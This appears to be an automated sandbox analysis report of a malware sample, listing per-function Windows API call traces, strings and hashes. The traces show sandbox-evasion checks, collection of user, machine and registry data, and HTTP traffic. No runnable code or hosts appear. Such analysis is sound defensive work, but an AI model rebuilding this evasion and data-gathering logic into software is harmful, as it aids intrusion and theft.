networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
StrCmpCA.SHLWAPI(?,02EB7320), ref: 00406353
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
HttpOpenRequestA.WININET(00000000,GET,?,02EB6960,00000000,00000000,00400100,00000000), ref: 004063D5
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0040644D
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004064BD
InternetCloseHandle.WININET(00000000), ref: 0040653F
InternetCloseHandle.WININET(00000000), ref: 00406549
InternetCloseHandle.WININET(00000000), ref: 00406553

Strings

FUA, xrefs: 004062E0, 0040656D, 0040652E, 0040646C, 004062E3
ERROR, xrefs: 00406457
ERROR, xrefs: 00406519
GET, xrefs: 004063CC

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$FUA$GET
API String ID: 3074848878-1334267432
Opcode ID: f3f7255e0d2dc24356a6d92e3ef249651165f71d209c9760ff987d984a1e72ad
Instruction ID: e13f8b4f5a4983f25bfc964ce73e77e76ffbf3c7ad5d81db2c216f4c68459c1c
Opcode Fuzzy Hash: f3f7255e0d2dc24356a6d92e3ef249651165f71d209c9760ff987d984a1e72ad
Instruction Fuzzy Hash: 33718171A00218ABDB14DF90DC59FEEB775AF44304F1081AAF6067B1D4DBB86A84CF59

Function 004184B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

RegOpenKeyExA.KERNEL32(00000000,02EB3650,00000000,00020019,00000000,004205BE), ref: 00418534
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
wsprintfA.USER32 ref: 004185E9
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041860B
RegCloseKey.ADVAPI32(00000000), ref: 0041861C
RegCloseKey.ADVAPI32(00000000), ref: 00418629

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Strings

- , xrefs: 00418733
?, xrefs: 0041850A
%s\%s, xrefs: 004185DD

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 48b3856a4b7a08adbcf43253a443092526ad4724ebfb5700d99c2b9c1c41cab3
Instruction ID: c228fa157c9b2873a9233ab8a396ad333d8a8ae6667b392d6015aff843962e7d
Opcode Fuzzy Hash: 48b3856a4b7a08adbcf43253a443092526ad4724ebfb5700d99c2b9c1c41cab3
Instruction Fuzzy Hash: 47812D71911118ABDB24DB50DD95FEAB7B9BF08314F1082DEE10966180DF746BC8CFA9

Function 00415760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,02EB2270,?,004210F4,?,00000000), ref: 0041AB3B
Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415894
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004158F1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415AA7

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 00415440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415478

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 00415510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415568
Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 0041557F
Part of subcall function 00415510: StrStrA.SHLWAPI(00000000,00000000), ref: 004155B4
Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 004155D3
Part of subcall function 00415510: strtok.MSVCRT(00000000,?), ref: 004155EE
Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 004155FE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004159DB
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415B90
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415C5C
Sleep.KERNEL32(0000EA60), ref: 00415C6B

Strings

ERROR, xrefs: 004159CD
ERROR, xrefs: 00415A99
ERROR, xrefs: 00415886
ERROR, xrefs: 004158E3
ERROR, xrefs: 00415B82
ERROR, xrefs: 00415C4E

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleepstrtok
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3630751533-2791005934
Opcode ID: 93186e085ff129a73f9e0ab74c49d77d7277fa139757a84e451318394f26fa84
Instruction ID: 55671caa9f17e02bf2b096751d64d2e50591885947f125be0164830bf8637258
Opcode Fuzzy Hash: 93186e085ff129a73f9e0ab74c49d77d7277fa139757a84e451318394f26fa84
Instruction Fuzzy Hash: 30E1A331A111049BCB14FBA1EDA6EED733EAF54304F40856EF50666091EF386B98CB5A

Function 00417690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004176D2
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041770F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417793
HeapAlloc.KERNEL32(00000000), ref: 0041779A
wsprintfA.USER32 ref: 004177D0

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Strings

:, xrefs: 004176EC
C, xrefs: 004176DC
\, xrefs: 004176F0

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 3790021787-3809124531
Opcode ID: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
Instruction ID: 56630df3f9a1121e358c86d43682af9e85f8bbcd47ea8763ba8f74f533c9f43c
Opcode Fuzzy Hash: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
Instruction Fuzzy Hash: 8541B6B1D05358DBDB10DF94CC45BDEBBB8AF48704F10009AF509A7280D7786B84CBA9

Function 00418290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,02EB5870,00000000,?,00420E14,00000000,?,00000000), ref: 004182C0
HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,02EB5870,00000000,?,00420E14,00000000,?,00000000,00000000), ref: 004182C7
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 004182E8
__aulldiv.LIBCMT ref: 00418302
__aulldiv.LIBCMT ref: 00418310
wsprintfA.USER32 ref: 0041833C

Strings

@, xrefs: 004182DD
%d MB, xrefs: 00418333

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2886426298-3474575989
Opcode ID: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
Instruction ID: 389ef6515a1f2427be64b00d9458de7be2b91b0079cd17c5d853587b1d371e56
Opcode Fuzzy Hash: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
Instruction Fuzzy Hash: 8B214AF1E44218ABDB00DFD5DD49FAEBBB9FB44B04F10450AF615BB280D77969008BA9

Function 048C003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 048C024D

Strings

cess, xrefs: 048C018D
kernel32.dll, xrefs: 048C008F, 048C0095

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: bd9e77228a92fd0b16ef38f927e9806ca237c2a912bb725c33ce2dfc6e2dd51a
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 9F527A74A01229DFDB64CF98C984BACBBB1BF09304F1485D9E50DAB351DB30AA85DF15

Function 00416C90 Relevance: 10.6, APIs: 7, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,02E38E68), ref: 00419BF1
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,02E38E50), ref: 00419C0A
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,02E38E98), ref: 00419C22
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,02E38E80), ref: 00419C3A
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,02E38DD8), ref: 00419C53
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,02EB05F8), ref: 00419C6B
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,02E32668), ref: 00419C83
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,02E32688), ref: 00419C9C
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,02E38DF0), ref: 00419CB4
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,02E38E08), ref: 00419CCC
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,02E38E20), ref: 00419CE5
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,02E38E38), ref: 00419CFD
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,02E32568), ref: 00419D15
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,02EB1EF0), ref: 00419D2E

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211

Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416CB7,00420AF3), ref: 0040116A
Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E

Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416CBC), ref: 0040112B
Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416CBC), ref: 00401132
Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143

Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294

Part of subcall function 00416A10: GetUserDefaultLangID.KERNEL32(?,?,00416CC6,00420AF3), ref: 00416A14

GetUserDefaultLCID.KERNEL32 ref: 00416CC6

Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6

Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F

Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02EB2270,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416D6A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416D88
CloseHandle.KERNEL32(00000000), ref: 00416D99
Sleep.KERNEL32(00001770), ref: 00416DA4
CloseHandle.KERNEL32(?,00000000,?,02EB2270,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416DBA
ExitProcess.KERNEL32 ref: 00416DC2

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 3511611419-0
Opcode ID: 32fb34536166014d7c58d27a16746fd28ebf0fa137deb214c181cbfce6898861
Instruction ID: 27cf1f4c78a26a12fad1801110170cb785a0876a7ac7b1f74ab5ff3c6832b849
Opcode Fuzzy Hash: 32fb34536166014d7c58d27a16746fd28ebf0fa137deb214c181cbfce6898861
Instruction Fuzzy Hash: CB315E30A05104ABCB04FBF1EC56BEE7379AF44314F50492FF11266196EF786A85C66E

Function 0041856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
wsprintfA.USER32 ref: 004185E9
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041860B
RegCloseKey.ADVAPI32(00000000), ref: 0041861C
RegCloseKey.ADVAPI32(00000000), ref: 00418629

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

RegQueryValueExA.KERNEL32(00000000,02EB57E0,00000000,000F003F,?,00000400), ref: 0041867C
lstrlenA.KERNEL32(?), ref: 00418691
RegQueryValueExA.KERNEL32(00000000,02EB5828,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B3C), ref: 00418729
RegCloseKey.ADVAPI32(00000000), ref: 00418798
RegCloseKey.ADVAPI32(00000000), ref: 004187AA

Strings

%s\%s, xrefs: 004185DD

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: b35235786b948e0e6555158c1c0efb0b11028fcec8c55c6120cd3185db22f78a
Instruction ID: 130e8712b2d17d0f4a3aa70f9b32a38deb323cc32c4c6a80807e33934adfa5f1
Opcode Fuzzy Hash: b35235786b948e0e6555158c1c0efb0b11028fcec8c55c6120cd3185db22f78a
Instruction Fuzzy Hash: 0F211B71A112189BDB24DB54DC85FE9B3B9FB48704F1081D9E609A6180DF746AC5CF98

Function 00404800 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

Strings

<, xrefs: 00404819

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: ??2@$CrackInternetlstrlen
String ID: <
API String ID: 1683549937-4251816714
Opcode ID: 994daec21f0517629ae22a04d51c011e227e96814832a9a45039b376b6c0c140
Instruction ID: 160db8237089610cf3963e488d7c28046b69bb3d6c402c1973a99714a059ae02
Opcode Fuzzy Hash: 994daec21f0517629ae22a04d51c011e227e96814832a9a45039b376b6c0c140
Instruction Fuzzy Hash: 9F2149B1D00219ABDF14DFA5EC4AADD7B75FF04320F008229F925A7290EB706A19CF95

Function 00417820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417834
HeapAlloc.KERNEL32(00000000), ref: 0041783B
RegOpenKeyExA.KERNEL32(80000002,02E38558,00000000,00020119,00000000), ref: 0041786D
RegQueryValueExA.KERNEL32(00000000,02EB55E8,00000000,00000000,?,000000FF), ref: 0041788E
RegCloseKey.ADVAPI32(00000000), ref: 00417898

Strings

Windows 11, xrefs: 0041784D

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3466090806-2517555085
Opcode ID: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
Instruction ID: 90abcce2ecfc2a5b8cd512a74185dd25ab23219ddadcc09848e79f4871c60c5e
Opcode Fuzzy Hash: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
Instruction Fuzzy Hash: FD01A274E09304BBEB00DBE4ED49FAE7779EF48700F00419AFA04A7290E7749A40CB55

Function 004178B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 004178C4
HeapAlloc.KERNEL32(00000000), ref: 004178CB
RegOpenKeyExA.KERNEL32(80000002,02E38558,00000000,00020119,00417849), ref: 004178EB
RegQueryValueExA.KERNEL32(00417849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041790A
RegCloseKey.ADVAPI32(00417849), ref: 00417914

Strings

CurrentBuildNumber, xrefs: 00417901

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
